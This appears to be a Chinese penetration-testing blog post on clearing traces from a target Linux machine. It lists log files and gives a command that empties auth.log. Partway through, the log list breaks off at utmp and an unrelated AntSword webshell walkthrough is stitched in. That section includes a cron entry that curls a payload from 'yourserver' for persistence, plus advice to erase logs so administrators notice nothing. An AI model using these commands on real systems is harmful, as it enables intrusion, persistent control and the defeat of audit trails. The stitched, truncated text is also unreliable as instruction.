靶机渗透(零)清除痕迹

清除痕迹

 

1.查看日志文件(/var/log)

2./var/log/auth.log(身份认证日志)

3./var/log/btmp(错误登录日志)

4./var/log/utmp(当前登录的用户信息)

5./var/log/wtmp(永久记录用户登录、注销及系统的启动、停机的事件)

6./var/log/faillog(登录失败日志)

7./var/log/lastlog(最后一次登录时间日志)

8./root/.bash_history(历史操作文件)


1.查看日志文件(/var/log)

2./var/log/auth.log(身份认证日志)

cat /var/log/auth.log
echo > /var/log/auth.log

  • auth.log包含系统授权信息(用户登录和使用的权限机制)等

  • 可以使用“echo > 日志路径”,来清空日志文件内容

3./var/log/btmp(错误登录日志)

sudo last -f /var/log/btmp

  • 该日志是一个二进制文件,不能直接通过文本编辑器打开

4./var/log/utmp

### 关于 Vulnhub 靶机渗透测试教学资源 对于希望深入学习并实践渗透测试技能的人来说,Vulnhub 提供了一个理想的平台。JIS-CTF入门靶场非常适合刚开始接触渗透测试的新手[^4]。 #### 蚁剑 (AntSword) 的使用教程 蚁剑是一款功能强大的 WebShell 管理工具,支持多种编程语言编写的WebShell管理,并且具有良好的界面设计和丰富的特性。以下是基于蚁剑进行渗透测试的一个简单流程: 1. **获取 WebShell** 在许多情况下,通过漏洞利用可以获得目标服务器上的一个简易webshell访问权限。例如,在某些特定条件下可以上传php文件或执行远程代码注入攻击获得初步控制权。 2. **连接至蚁剑客户端** 下载并安装蚁剑后打开程序,点击`新建站点`,输入相应的URL路径,用户名密码等信息完成配置。 3. **探索与提权** 利用蚁剑内置的功能模块进一步探测系统内部结构,尝试发现潜在的安全弱点以便实施本地提权或其他高级操作。比如读取敏感文件、枚举网络接口等等。 4. **保持持久化** 成功取得较高权限之后,考虑如何建立稳定可靠的反向连接通道以维持长期控制。这可能涉及到设置计划任务、修改启动项等多种手段确保即使重启也能自动恢复会话。 ```bash # 设置Linux定时任务实现开机自启脚本 echo "* * * * * curl http://yourserver/payload.php" >> /var/spool/cron/root ``` 5. **清理痕迹** 完成所有预定动作前务必清除日志记录和其他可能会暴露身份的信息以防被管理员察觉异常活动的存在。 需要注意的是上述内容仅用于合法授权范围内的安全评估工作,请勿非法入侵他人计算机信息系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值